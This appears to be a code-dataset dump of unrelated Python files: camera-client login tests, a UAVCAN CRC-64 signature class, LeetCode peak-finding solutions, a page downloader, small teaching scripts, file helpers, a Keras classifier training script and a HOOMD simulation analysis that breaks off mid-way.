mock.call(\"host-a\", \"admin\", \"seekret\")\n assert mock_camera.return_value.login.call_count == 1\n assert mock_camera.return_value.login.call_args == mock.call()\n\n @mock.patch(\"uvcclient.store.get_info_store\")\n @mock.patch(\"uvcclient.camera.UVCCameraClientV320\")\n def test_login_tries_both_addrs_and_caches(self, mock_camera, mock_store):\n \"\"\"Test the login tries.\"\"\"\n responses = [0]\n\n def mock_login(*a):\n \"\"\"Mock login.\"\"\"\n try:\n responses.pop(0)\n raise OSError\n except IndexError:\n pass\n\n 
mock_store.return_value.get_camera_password.return_value = None\n mock_camera.return_value.login.side_effect = mock_login\n self.uvc._login()\n assert 2 == mock_camera.call_count\n assert \"host-b\" == self.uvc._connect_addr\n\n mock_camera.reset_mock()\n self.uvc._login()\n assert mock_camera.call_count == 1\n assert mock_camera.call_args == mock.call(\"host-b\", \"admin\", \"seekret\")\n assert mock_camera.return_value.login.call_count == 1\n assert mock_camera.return_value.login.call_args == mock.call()\n\n @mock.patch(\"uvcclient.store.get_info_store\")\n @mock.patch(\"uvcclient.camera.UVCCameraClientV320\")\n def test_login_fails_both_properly(self, mock_camera, mock_store):\n \"\"\"Test if login fails properly.\"\"\"\n mock_camera.return_value.login.side_effect = socket.error\n assert self.uvc._login() is None\n assert self.uvc._connect_addr is None\n\n def test_camera_image_tries_login_bails_on_failure(self):\n \"\"\"Test retrieving failure.\"\"\"\n with mock.patch.object(self.uvc, \"_login\") as mock_login:\n mock_login.return_value = False\n assert self.uvc.camera_image() is None\n assert mock_login.call_count == 1\n assert mock_login.call_args == mock.call()\n\n def test_camera_image_logged_in(self):\n \"\"\"Test the login state.\"\"\"\n self.uvc._camera = mock.MagicMock()\n assert self.uvc._camera.get_snapshot.return_value == self.uvc.camera_image()\n\n def test_camera_image_error(self):\n \"\"\"Test the camera image error.\"\"\"\n self.uvc._camera = mock.MagicMock()\n self.uvc._camera.get_snapshot.side_effect = camera.CameraConnectError\n assert self.uvc.camera_image() is None\n\n def test_camera_image_reauths(self):\n \"\"\"Test the re-authentication.\"\"\"\n responses = [0]\n\n def mock_snapshot():\n \"\"\"Mock snapshot.\"\"\"\n try:\n responses.pop()\n raise camera.CameraAuthError()\n except IndexError:\n pass\n return \"image\"\n\n self.uvc._camera = mock.MagicMock()\n self.uvc._camera.get_snapshot.side_effect = mock_snapshot\n with mock.patch.object(self.uvc, \"_login\") as mock_login:\n assert \"image\" == self.uvc.camera_image()\n assert mock_login.call_count == 1\n assert mock_login.call_args == mock.call()\n assert [] == responses\n\n def test_camera_image_reauths_only_once(self):\n \"\"\"Test if the re-authentication only happens once.\"\"\"\n self.uvc._camera = mock.MagicMock()\n self.uvc._camera.get_snapshot.side_effect = camera.CameraAuthError\n with mock.patch.object(self.uvc, \"_login\") as mock_login:\n with pytest.raises(camera.CameraAuthError):\n self.uvc.camera_image()\n assert mock_login.call_count == 1\n assert mock_login.call_args == mock.call()\n","sub_path":"tests/components/uvc/test_camera.py","file_name":"test_camera.py","file_ext":"py","file_size_in_byte":13925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"36339442","text":"#\n# Copyright (C) 2014-2015 UAVCAN Development Team \n#\n# This software is distributed under the terms of the MIT License.\n#\n# Author: Pavel Kirienko \n# Ben Dyer \n#\n\nfrom __future__ import division, absolute_import, print_function, unicode_literals\n\n#\n# CRC-64-WE\n# Description: http://reveng.sourceforge.net/crc-catalogue/17plus.htm#crc.cat-bits.64\n# Initial value: 0xFFFFFFFFFFFFFFFF\n# Poly: 0x42F0E1EBA9EA3693\n# Reverse: no\n# Output xor: 0xFFFFFFFFFFFFFFFF\n# Check: 0x62EC59E3F1A4F00A\n#\n\n\nclass Signature:\n '''\n This class implements the UAVCAN DSDL signature hash function. 
Please refer to the specification for details.\n '''\n MASK64 = 0xFFFFFFFFFFFFFFFF\n POLY = 0x42F0E1EBA9EA3693\n\n def __init__(self, extend_from=None):\n '''\n extend_from Initial value (optional)\n '''\n if extend_from is not None:\n self._crc = (int(extend_from) & Signature.MASK64) ^ Signature.MASK64\n else:\n self._crc = Signature.MASK64\n\n def add(self, data_bytes):\n '''Feed ASCII string or bytes to the signature function'''\n try:\n if isinstance(data_bytes, basestring): # Python 2.7 compatibility\n data_bytes = map(ord, data_bytes)\n except NameError:\n if isinstance(data_bytes, str): # This branch will be taken on Python 3\n data_bytes = map(ord, data_bytes)\n\n for b in data_bytes:\n self._crc ^= (b << 56) & Signature.MASK64\n for _ in range(8):\n if self._crc & (1 << 63):\n self._crc = ((self._crc << 1) & Signature.MASK64) ^ Signature.POLY\n else:\n self._crc <<= 1\n\n def get_value(self):\n '''Returns integer signature value'''\n return (self._crc & Signature.MASK64) ^ Signature.MASK64\n\n\ndef compute_signature(data):\n '''\n One-shot signature computation for ASCII string or bytes.\n Returns integer signature value.\n '''\n s = Signature()\n s.add(data)\n return s.get_value()\n\n\nif __name__ == '__main__':\n s = Signature()\n s.add(b'123')\n s.add('456789')\n assert s.get_value() == 0x62EC59E3F1A4F00A
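\n # Added note (illustrative): the one-shot helper must reproduce the CRC\n # catalogue check value quoted in the header comment above for the\n # standard check input:\n # assert compute_signature('123456789') == 0x62EC59E3F1A4F00A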
\n","sub_path":"uavcan/dsdl/signature.py","file_name":"signature.py","file_ext":"py","file_size_in_byte":2242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"504881963","text":"# Basic Idea: Binary search\n\n# Elaboration: \n# if an element (not the right-most one) is smaller than its right neighbor, \n# then there must be a peak element on its right, because the elements on its right are either \n# 1. always increasing -> the right-most element is the peak\n# 2. always decreasing -> the left-most element is the peak\n# 3. first increasing then decreasing -> the pivot point is the peak\n# 4. first decreasing then increasing -> the left-most element is the peak \n\n# Therefore, we can restrict the search to the elements on its right (cut the array in half)\n# The same idea applies when an element (not the left-most one) is smaller than its left neighbor.\n\n# Conditions:\n# 1. array length is 1 -> return the only index \n# 2. array length is 2 -> return the bigger number's index \n# 3. array length is bigger than 2 -> \n# (1) find mid, compare it with its left and right neighbors \n# (2) return mid if nums[mid] is greater than both neighbors\n# (3) take the right half of the array if nums[mid] is smaller than its right neighbor\n# (4) otherwise, take the left half\n\nfrom typing import List # needed for the type hints below\n\n\n# Run time: O(logn)\n# Memory: constant\nclass Solution:\n def findPeakElement(self, nums: List[int]) -> int:\n l, r = 0, len(nums)-1\n while l < r:\n mid = (l+r)//2\n if nums[mid] > nums[mid+1]:\n r = mid\n else:\n l = mid + 1\n return l\n\n# Run time: O(logn)\n# Memory: constant\ndef findPeakElement(self, nums):\n left = 0\n right = len(nums)-1\n\n # handle condition 3\n while left < right-1:\n mid = (left+right)//2\n if nums[mid] > nums[mid+1] and nums[mid] > nums[mid-1]:\n return mid\n # increasing, pick right\n if nums[mid] < nums[mid+1]:\n left = mid+1\n # decreasing, pick left\n else:\n right = mid-1\n \n #handle condition 1 and 2\n return left if nums[left] >= nums[right] else right\n# Runtime: 25 ms, faster than 95.93% of Python online submissions for Find Peak Element.\n# Memory Usage: 13.6 MB, less than 69.96% of Python online submissions for Find Peak Element.\n\nclass Solution(object):\n def findPeakElement(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n if len(nums) == 1:\n return 0\n elif len(nums) == 2:\n return 0 if nums[0] > nums[1] else 1\n \n l,r=0,len(nums)-1\n while l < r:\n mid = (l+r)//2\n # peak: greater than both neighbors\n if nums[mid+1] < nums[mid] and nums[mid] > nums[mid-1]:\n return mid \n # increasing: must be at least a peak between mid and r\n # if mid+1 is on the edge, it's a peak\n elif nums[mid+1] > nums[mid] and nums[mid] > nums[mid-1]:\n if mid+1 == r:\n return r\n else:\n l = mid\n # decreasing: must be at least a peak between l and mid\n # if mid-1 is on the edge, it's a peak\n elif nums[mid+1] < nums[mid] and nums[mid] < nums[mid-1]: \n if mid-1 == l:\n return l\n else:\n r = mid\n # hole: must be at least a peak between mid and r as nums[-1] = -inf\n elif nums[mid+1] > nums[mid] and nums[mid] < nums[mid-1]:\n l = mid+1\n return l\n# Runtime: 36 ms, faster than 69.80% of Python online submissions for Find Peak Element.\n# Memory Usage: 13.7 MB, less than 18.94% of Python online submissions for Find Peak Element.
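\n\n# Added sanity check (illustrative, exercises the last Solution class above):\n# Solution().findPeakElement([1, 2, 3, 1]) -> 2, since nums[2] = 3 is greater\n# than both of its neighbours.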
","sub_path":"162. Find Peak Element.py","file_name":"162. Find Peak Element.py","file_ext":"py","file_size_in_byte":3713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"154147098","text":"import os,re,csv,time,random\nimport requests\nfrom urllib import request,parse\nfrom bs4 import BeautifulSoup as bs\nimport traceback\n\nhead2={\n'Accept':\"\",\n'Accept-Encoding':'gzip, deflate',\n'Accept-Language':'zh-CN,zh;q=0.9',\n'Connection':'keep-alive',\n'Cookie':\"\",\n'Host':'',\n'Upgrade-Insecure-Requests':'1',\n'User-Agent':'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/63.0.3239.84'\n}\n\nhost = r\"\"\ndst = r\"\"\nsrcfi = csv.reader(open(r\"fenlei.csv\",'r'))\n\nnum = 1\nfor fenlei in srcfi:\n dir_name = fenlei[0]\n seed_url = fenlei[1]\n savedir = os.path.join(dst,dir_name)\n if not os.path.exists(savedir):\n os.mkdir(savedir)\n \n s_requ = requests.post(seed_url,headers=head2) # POST request: fetch the first page of each category and use it as the starting point\n s_page = s_requ.text\n with open(os.path.join(savedir,\"1.html\"),'w')as html0: # save the first page\n html0.write(s_page)\n num = num+1\n s_soup = bs(s_page,\"html.parser\") # parse the fetched first page as HTML\n linkls = {} \n als = s_soup.select(\".next\")[0].select(\"a\") # load the page numbers at the bottom of the first page into the dict linkls{}\n for link in als:\n s_num = link.get_text()\n s_href = link.get(\"href\")\n if s_num not in linkls:\n linkls[s_num] = s_href\n sumpage = s_soup.select(\"#ctl\")[0].get_text() # read the total page count of this subcategory from the bottom of the page\n st = sumpage[sumpage.find(\"/\"):]\n page_num = int(re.findall(\"\\d+\",st)[0]) \n \n for i in range(2,page_num+1): # download in a loop until the last page of this subcategory\n url = host + linkls[str(i)]\n savepath = savedir +\"/\"+str(i)+\".html\"\n num = num+1\n print(num,savepath)\n \n try:\n response = requests.post(url,headers=head2,timeout=5) \n if response.status_code ==200:\n page = response.text\n except :\n # savepath should be written to a log file here\n traceback.print_exc()\n\n #page = response.text\n \n \n \n if not os.path.exists(savepath):\n with open(savepath,'w')as html:\n html.write(page)\n \n newsoup = bs(page,\"html.parser\")\n newls = newsoup.select(\".next\")[0].select(\"a\")\n linkls = {}\n for link in newls:\n pagenum = link.get_text()\n pagehref = link.get(\"href\")\n if pagenum not in linkls:\n linkls[pagenum] = pagehref\n \n if num %100 ==0:\n time.sleep(5) \n else:\n time.sleep(1+random.uniform(0,2)) \n\n\n","sub_path":"htmload.py","file_name":"htmload.py","file_ext":"py","file_size_in_byte":2582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"18555181","text":"'''\r\n Accept five numbers from user and print only even numbers.\r\n'''\r\n\r\nt=()\r\nprint(\"Enter five numbers\")\r\nfor i in range(5):\r\n t=t+(int(input()),)\r\n\r\n \r\nprint(\"even numbers are\")\r\nfor i in t:\r\n if(i%2==0):\r\n print(i)\r\n \r\n","sub_path":"26.09.2020 Python/even.py","file_name":"even.py","file_ext":"py","file_size_in_byte":272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"415014933","text":"variabel = 10\n\n# Raises UnboundLocalError, since variabel is not in the procedure's scope\ndef leggTilTi():\n variabel += 10\n\n# Use try-except to catch the error and let the program keep running\ntry:\n leggTilTi()\nexcept UnboundLocalError:\n print(\"Oops\")\n\n# In other words, procedures are allowed to read variables, but not to change them\ndef printVariabel():\n print(variabel)\n\ndef leggTilTiTilNy():\n nyvariabel = variabel + 10\n print(nyvariabel)\n\nleggTilTiTilNy()\n\nprintVariabel()\n\nprint(variabel)\n\n# If we use 
parameters and return values, we get access to everything that is passed in; parameters are a way to give procedures/functions access!\ndef leggTilTi(variabel):\n variabel += 10\n return variabel\n\nprint(leggTilTi(variabel))\n\n# But the variable itself has not been changed\nprint(variabel)
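\n\n# Added illustration (not part of the original exercise): with the global\n# keyword a procedure CAN rebind a module-level variable directly.\ndef leggTilTiGlobalt():\n global variabel\n variabel += 10\n\nleggTilTiGlobalt()\nprint(variabel) # now 10 more than before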
\n","sub_path":"Uke 5/skop.py","file_name":"skop.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"360553756","text":"from pathlib import Path\nimport locale\n\nfrom pylt3.type_helpers import verify_kwargs, is_simple_list\n\n\ndef scan_dir_and_execute(root, exec_func, exclude_dirs=None, verbose=0, **kwargs):\n default_params = {'recursive': True}\n kwargs = verify_kwargs(default_params, kwargs)\n\n if verbose not in range(0, 3):\n raise ValueError(f\"Unexpected value {verbose} for verbose. 0, 1, or 2 expected\")\n\n # Rather than use an empty list that would be mutated at each call (Mutable Default Argument), use None and check\n if exclude_dirs is None:\n exclude_dirs = []\n\n if verbose > 0:\n print(f\"TRAVERSING {root}\", flush=True)\n\n for entry in Path(root).glob('*'):\n if entry.is_dir() and entry.name not in exclude_dirs:\n if kwargs['recursive']:\n # If truth-y value: keep value, otherwise use None\n next_exclude = exclude_dirs if exclude_dirs else None\n scan_dir_and_execute(entry.path, exec_func, next_exclude, verbose=verbose, recursive=True)\n elif entry.is_file():\n if verbose > 1:\n print(f\"\\tProcessing {entry.name}\", flush=True)\n\n exec_func(entry.path)\n\n return None\n\n\ndef scan_file_and_execute(file, exec_func, verbose=0, **kwargs):\n default_params = {'encoding': locale.getpreferredencoding()}\n kwargs = verify_kwargs(default_params, kwargs)\n\n if verbose not in range(0, 3):\n raise ValueError(f\"Unexpected value {verbose} for verbose\")\n\n line_i = 0\n with open(file, encoding=kwargs['encoding']) as f:\n for line in f:\n if verbose > 0:\n proc_str = \"Processing\"\n if verbose > 1:\n proc_str += f\" file {file}\"\n proc_str += f\" line {line_i+1}\"\n print(proc_str, end=\"\\r\", flush=True)\n\n exec_func(line, line_i)\n line_i += 1\n\n return None\n\n\ndef concatenate_files(input_item, output_file, extension=None, remove_headers=0, verbose=0, **kwargs):\n default_params = {'encoding': locale.getpreferredencoding(), 'recursive': True, 'retain_first_header': False}\n kwargs = verify_kwargs(default_params, kwargs)\n\n if verbose not in range(0, 3):\n raise ValueError(f\"Unexpected value {verbose} for verbose\")\n\n if remove_headers and not remove_headers > 0:\n raise ValueError(f\"Unexpected value {remove_headers} for remove_headers. Use a positive integer that indicates \"\n f\"how many lines should be removed from the top of each file. True will remove the first line\")\n\n if extension is None:\n extension = ''\n elif not isinstance(extension, str):\n raise ValueError(f\"Unexpected value {extension} for extension. A str value is expected\")\n\n is_file_list = True if isinstance(input_item, list) else False\n\n files_skipped_n = 0\n files_concat_n = 0\n\n def append_to_file(file_path, _fout):\n nonlocal files_concat_n, files_skipped_n\n if not extension or str(file_path).endswith(extension):\n files_concat_n = files_concat_n+1\n with open(file_path, 'r', encoding=kwargs['encoding']) as fin:\n line_n = 0\n for line in fin:\n line_n = line_n+1\n if (files_concat_n == 1 and kwargs['retain_first_header']) or line_n > remove_headers:\n _fout.write(line)\n else:\n files_skipped_n += 1\n\n return None\n\n with open(output_file, 'w', encoding=kwargs['encoding']) as fout:\n if is_file_list:\n for file in input_item:\n # Resolve, i.e. ensure rel->abs path, and append\n append_to_file(Path(file).resolve(), fout)\n else:\n scan_dir_and_execute(input_item, lambda _file: append_to_file(_file, fout), recursive=kwargs['recursive'],\n verbose=verbose)\n if verbose > 0:\n print(f\"Finished! Concatenated {files_concat_n} files, skipped {files_skipped_n} files\", flush=True)\n\n return output_file\n\n\ndef print_simple_dict(simple_dict, output_file, **kwargs):\n default_params = {'encoding': locale.getpreferredencoding()}\n kwargs = verify_kwargs(default_params, kwargs)\n\n with open(output_file, 'w', encoding=kwargs['encoding']) as fout:\n for key, val in simple_dict.items():\n if is_simple_list(key):\n key = \"\\t\".join(key)\n if is_simple_list(val):\n val = \"\\t\".join(val)\n\n fout.write(f\"{key}\\t{val}\\n\")\n\n return output_file\n\n\ndef print_tuplelist(tupelist, output_file, **kwargs):\n default_params = {'encoding': locale.getpreferredencoding()}\n kwargs = verify_kwargs(default_params, kwargs)\n\n with open(output_file, 'w', encoding=kwargs['encoding']) as fout:\n for tupe in tupelist:\n key = tupe[0]\n val = tupe[1]\n if is_simple_list(key):\n key = \"\\t\".join(key)\n if is_simple_list(val):\n val = \"\\t\".join(val)\n\n fout.write(f\"{key}\\t{val}\\n\")\n\n return output_file
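\n\n# Example usage (illustrative only; the paths below are hypothetical):\n# scan_dir_and_execute('/tmp/corpus', print, exclude_dirs=['.git'], verbose=1)\n# concatenate_files('/tmp/corpus', '/tmp/all.txt', extension='.txt',\n# remove_headers=1, retain_first_header=True)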
\n","sub_path":"pylt3/file_helpers.py","file_name":"file_helpers.py","file_ext":"py","file_size_in_byte":5120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"101544719","text":"import os\n\n#from keras import *\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras import metrics\n\nimport keras.backend as K\nimport keras.callbacks\nimport keras\nimport numpy\n\nimport sys\nimport h5py\n\nimport argparse\nimport random\nimport time\n\n########\n# INIT #\n########\n\nnumpy.random.seed( 0 )\n\n#############\n# CONSTANTS #\n#############\n\n#0 1 2 3 4 5 6 7 8 9 10\n#best_possible_hbond_score,worst_possible_clash_score,tx,ty,tz,rx,ry,rz,angle1,angle2,dist\n\nBEST_POSSIBLE_HBOND_SCORE = int( 0 )\nWORST_POSSIBLE_CLASH_SCORE = int( 1 )\n\nTX = int( 2 )\nTY = int( 3 )\nTZ = int( 4 )\n\nRX = int( 5 )\nRY = int( 6 )\nRZ = int( 7 )\n\nANGLE1 = int( 8 )\nANGLE2 = int( 9 )\nDIST = int( 10 )\n\n#########################\n# COMMAND LINE SETTINGS #\n#########################\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument( \"--num_neurons_in_first_hidden_layer\", help=\"Number of neurons for first hidden layer.\", default=\"100\", type=int, required=False )\nparser.add_argument( \"--num_neurons_in_intermediate_hidden_layer\", help=\"Number of neurons for intermediate hidden layer.\", default=\"100\", type=int, required=False )\nparser.add_argument( \"--num_intermediate_hidden_layers\", help=\"Number of intermediate hidden layers.\", default=\"4\", type=int, required=False )\n\nparser.add_argument( \"--num_epochs\", help=\"Number of epochs to give to model.fit()\", default=\"150\", type=int, required=False )\n\nparser.add_argument( \"--test_predictions\", help=\"filename for test predictions\", default=\"\", required=False )\n\nparser.add_argument( \"--weight\", help=\"Class weight for 1\", default=\"3.0\", type=float, required=True )\n\nargs = parser.parse_args()\n\nnum_neurons_in_first_hidden_layer = args.num_neurons_in_first_hidden_layer\nprint( \"num_neurons_in_first_hidden_layer: \" + str( num_neurons_in_first_hidden_layer ) )\n\nnum_neurons_in_intermediate_hidden_layer = args.num_neurons_in_intermediate_hidden_layer\nprint( \"num_neurons_in_intermediate_hidden_layer: \" + str( num_neurons_in_intermediate_hidden_layer ) )\n\nnum_intermediate_hidden_layers = args.num_intermediate_hidden_layers\nprint( \"num_intermediate_hidden_layers: \" + str( num_intermediate_hidden_layers ) )\n\nnum_epochs = args.num_epochs #150 is small\nprint( \"num_epochs: \" + str( num_epochs ) )\n\nweight1 = args.weight\nprint( \"class weight for 1: \" + str( weight1 ) )\n\n#########\n# FUNCS #\n#########\n\ndef my_assert_equals( name, actual, theoretical ):\n if actual != theoretical:\n print( name + \" is equal to \" + actual + \" instead of \" + theoretical )\n exit( 1 )\n\ndef keep_hbond_score( score ):\n hbond_score = score[ BEST_POSSIBLE_HBOND_SCORE ]\n if hbond_score == 0:\n return True\n if hbond_score <= -0.5:\n return True\n return False\n\ndef normalize_single_input( input ):\n input[0] /= 20. #Tx\n input[1] /= 20. #Ty\n input[2] /= 20. #Tz\n \n input[3] /= 3.14 #Rx\n input[4] /= 3.14 #Ry\n input[5] -= 1.6 #Rz\n\n input[6] -= 1.6 #Theta1\n input[7] -= 1.6 #Theta2\n input[8] = (input[8]/15.) - 1 #D\n\ndef generate_data_from_file( filename ):\n dataset = numpy.genfromtxt( filename, delimiter=\",\", skip_header=0 )\n\n input = dataset[:,[ TX, TY, TZ, RX, RY, RZ, ANGLE1, ANGLE2, DIST ] ]\n output_hbond = dataset[:,[ BEST_POSSIBLE_HBOND_SCORE ] ]\n\n for x in output_hbond:\n for i in range( 0, len(x) ):\n if x[i] > 0:\n print( \"Some hbond value is positive! 
\" + str(x[i]) )\n exit( 1 )\n if x[i] != 0:\n x[i] = 1\n \n for x in input:\n normalize_single_input( x )\n \n return input, output_hbond\n\ndef evaluate_model( model, best_score_so_far, test_input, test_output_hbond, batch ):\n num_positives_actual = 0.\n num_positives_predicted = 0.\n num_positives_actual_and_predicted = 0.\n\n num_negatives_actual = 0.\n num_negatives_predicted = 0.\n num_negatives_actual_and_predicted = 0.\n \n predictions = model.predict( x=test_input );\n\n for i in range( 0, len(test_input) ):\n\n actual = test_output_hbond[ i ][ 0 ]\n prediction = predictions[ i ][ 0 ]\n\n if actual == 0:\n num_negatives_actual += 1\n if prediction < 0.5:\n num_negatives_predicted += 1\n num_negatives_actual_and_predicted += 1\n else:\n num_positives_predicted += 1\n else:\n num_positives_actual += 1\n if prediction < 0.5:\n num_negatives_predicted += 1\n else:\n num_positives_actual_and_predicted += 1\n num_positives_predicted += 1\n\n min = 1;\n score1 = num_positives_actual_and_predicted/num_positives_actual\n score2 = num_negatives_actual_and_predicted/num_negatives_actual\n if score1 < min:\n min = score1\n if score2 < min:\n min = score2\n\n saved = 0\n\n if min >= best_score_so_far:\n best_score_so_far = min\n model.save( \"best.h5\" )\n saved = 1\n\n print( str(x) + \" \" + str(score1) + \" \" + str(score2) + \" \" + str(saved) )\n\n return best_score_so_far\n\n\n#https://stackoverflow.com/questions/4601373/better-way-to-shuffle-two-numpy-arrays-in-unison\ndef shuffle_in_unison(a, b):\n rng_state = numpy.random.get_state()\n numpy.random.shuffle(a)\n numpy.random.set_state(rng_state)\n numpy.random.shuffle(b)\n\n###########\n# CLASSES #\n###########\nclass LossHistory(keras.callbacks.Callback):\n def on_train_begin(self, logs={}):\n self.losses = []\n\n def on_batch_end(self, batch, logs={}):\n self.losses.append(logs.get('loss'))\n\n###########\n# METRICS #\n###########\n\ndef mean_pred( y_true, y_pred ):\n return K.mean( y_pred )\n\n#########\n# START #\n#########\n\n# 1) Define Filenames\ntraining_input_file = \"training.dat\"\ntesting_input_file = \"testing.dat\"\n\ntraining_input, training_output_hbond = generate_data_from_file( training_input_file )\ntesting_input, testing_output_hbond = generate_data_from_file( testing_input_file )\n\n# 2) Define Model\n\nnum_input_dimensions = 9\nmodel = Sequential()\n\nmodel.add( Dense( num_neurons_in_first_hidden_layer, input_dim=num_input_dimensions, activation='relu') )\n\nfor x in range( 0, num_intermediate_hidden_layers ):\n model.add( Dense( num_neurons_in_intermediate_hidden_layer, activation='relu') )\n\nnum_neurons_in_final_layer = int( 1 )\nmodel.add( Dense( num_neurons_in_final_layer, activation='sigmoid') )\n\n# 3) Compile Model\n\nmetrics_to_output=[ 'accuracy' ]\nmodel.compile( loss='binary_crossentropy', optimizer='adam', metrics=metrics_to_output )\n\n# 4) Fit Model\nbest_score_so_far = 0\n\nfor x in range( 0, num_epochs ):\n start = time.time()\n print( \"Beginning epoch: \" + str(x) )\n \n shuffle_in_unison( training_input, training_output_hbond )\n\n i=0\n while i < len(training_input):\n j = len(training_input) - i\n if j > 100000:\n j = 100000\n i += 100000\n\n model.train_on_batch( x=training_input[ i : i+j ], y=training_output_hbond[ i : i+j ], class_weight={ 0 : 1, 1 : weight1 } )\n\n if ( x % 10 == 0 ):\n best_score_so_far = evaluate_model( model, best_score_so_far, testing_input, testing_output_hbond, x )\n\n end = time.time()\n print( \"\\tseconds: \" + str( end - start ) )\n\n\n\nbest_score_so_far = 
evaluate_model( model, best_score_so_far, testing_input, testing_output_hbond, num_epochs )\n","sub_path":"FirstTrainingRunLongLeaf/Run.test_on_kelso.py","file_name":"Run.test_on_kelso.py","file_ext":"py","file_size_in_byte":7461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"93399933","text":"'''\n# This is an 80 character line #\nCompute the pressure that corresponds to the LJ potential:\n -identify liquid bulk particles\n -identify gas bulk particles\n -compute area of dense bulk\n -compute area of all dense phase particles\n -compute area of gas bulk (exclude edge)\n -sum stress tensor for liquid\n -sum stress tensor for gas\n'''\n\nimport sys\n\n# Run locally\nsys.path.append('/Users/kolbt/Desktop/compiled/hoomd-blue/build')\nsys.path.append('/Users/kolbt/Desktop/compiled/gsd/build')\n# Run on the cpu\nsys.path.append('/nas/longleaf/home/kolbt/programs/cpu-hoomd/hoomd-blue/build')\n# Run on the gpu\nsys.path.append('/nas/longleaf/home/kolbt/programs/hoomd_2.2.1/hoomd-blue/build')\nsys.path.append('/nas/longleaf/home/kolbt/programs/gsd/build')\n\nimport gsd\nfrom gsd import hoomd\nfrom gsd import pygsd\n\nimport freud\nfrom freud import parallel\nfrom freud import box\nfrom freud import density\nfrom freud import cluster\n\nimport numpy as np\nimport math\nimport random\nfrom scipy import stats\n\nimport matplotlib\n#matplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nimport matplotlib.collections\nfrom matplotlib import colors\nimport matplotlib.gridspec as gridspec\nimport matplotlib.patches as patches\n\ndef computeTauPerTstep(epsilon, mindt=0.000001):\n '''Read in epsilon, output tauBrownian per timestep'''\n# if epsilon != 1.:\n# mindt=0.00001\n kBT = 1.0\n tstepPerTau = float(epsilon / (kBT * mindt))\n return 1. 
/ tstepPerTau\n\ndef roundUp(n, decimals=0):\n '''Round up size of bins to account for floating point inaccuracy'''\n multiplier = 10 ** decimals\n return math.ceil(n * multiplier) / multiplier\n \ndef getNBins(length, minSz=(2**(1./6.))):\n \"Given box size, return number of bins\"\n initGuess = int(length) + 1\n nBins = initGuess\n # This loop only exits on function return\n while True:\n if length / nBins > minSz:\n return nBins\n else:\n nBins -= 1\n\ndef findBins(lookN, currentInd, maxInds):\n '''Get the surrounding bin indices'''\n maxInds -= 1\n left = currentInd - lookN\n right = currentInd + lookN\n binsList = []\n for i in range(left, right):\n ind = i\n if i > maxInds:\n ind -= maxInds\n binsList.append(ind)\n return binsList\n\n# Get infile and open\ninFile = str(sys.argv[1])\nif inFile[0:7] == \"cluster\":\n add = 'cluster_'\nelse:\n add = ''\n \nf = hoomd.open(name=inFile, mode='rb')\n# Inside and outside activity from command line\npeA = float(sys.argv[2])\npeB = float(sys.argv[3])\nparFrac = float(sys.argv[4])\neps = float(sys.argv[5])\ntry:\n phi = float(sys.argv[6])\n intPhi = int(phi)\n phi /= 100.\nexcept:\n phi = 0.6\n intPhi = 60\n\n# Outfile to write data to\noutFile = add + 'pressure_pa' + str(peA) +\\\n '_pb' + str(peB) +\\\n '_xa' + str(parFrac) +\\\n '_phi' + str(intPhi) +\\\n '_ep' + '{0:.3f}'.format(eps) +\\\n '.txt'\n \ng = open(outFile, 'w') # write file headings\ng.write('Timestep'.center(10) + ' ' +\\\n 'Liquid'.center(10) + ' ' +\\\n 'liqN'.center(10) + ' ' +\\\n 'liqArea'.center(10) + ' ' +\\\n 'Gas'.center(10) + ' ' +\\\n 'gasN'.center(10) + ' ' +\\\n 'gasArea'.center(10) + '\\n')\ng.close()\n\nstart = 0 # first frame to process\ndumps = int(f.__len__()) # get number of timesteps dumped\nend = dumps # final frame to process\nstart = end - 1\n\nbox_data = np.zeros((1), dtype=np.ndarray) # box dimension holder\nr_cut = 2**(1./6.) # potential cutoff\ntauPerDT = computeTauPerTstep(epsilon=eps) # brownian time per timestep\n\nwith hoomd.open(name=inFile, mode='rb') as t:\n snap = t[0]\n first_tstep = snap.configuration.step\n box_data = snap.configuration.box\n l_box = box_data[0]\n h_box = l_box / 2.\n typ = snap.particles.typeid\n partNum = len(typ)\n # Set up cluster computation using box\n f_box = box.Box(Lx=l_box, Ly=l_box, is2D=True)\n my_clust = cluster.Cluster()\n c_props = cluster.ClusterProperties()\n # Compute each mesh\n NBins = getNBins(l_box, r_cut)\n sizeBin = roundUp((l_box / NBins), 6)\n \n # Loop through each timestep\n for j in range(start, end):\n snap = t[j]\n # Easier accessors\n pos = snap.particles.position # position\n pos[:,-1] = 0.0\n xy = np.delete(pos, 2, 1)\n typ = snap.particles.typeid # type\n tst = snap.configuration.step # timestep\n tst -= first_tstep # normalize by first timestep\n tst *= tauPerDT # convert to Brownian time\n \n # Compute clusters for this timestep\n system = freud.AABBQuery(f_box, f_box.wrap(pos))\n \n # Compute neighbor list for only largest cluster\n my_clust.compute(system, neighbors={'r_max': 1.0})\n ids = my_clust.cluster_idx # get id of each cluster\n c_props.compute(system, ids) # find cluster properties\n clust_size = c_props.sizes # find cluster sizes\n # Minimum size to be considered the dense phase\n minSize = 5000\n \n # Refine our choice of the dense phase, only particles with six neighbors\n gasPos = []\n liqPos = []\n print(\"Getting positions of liquid and gas... 
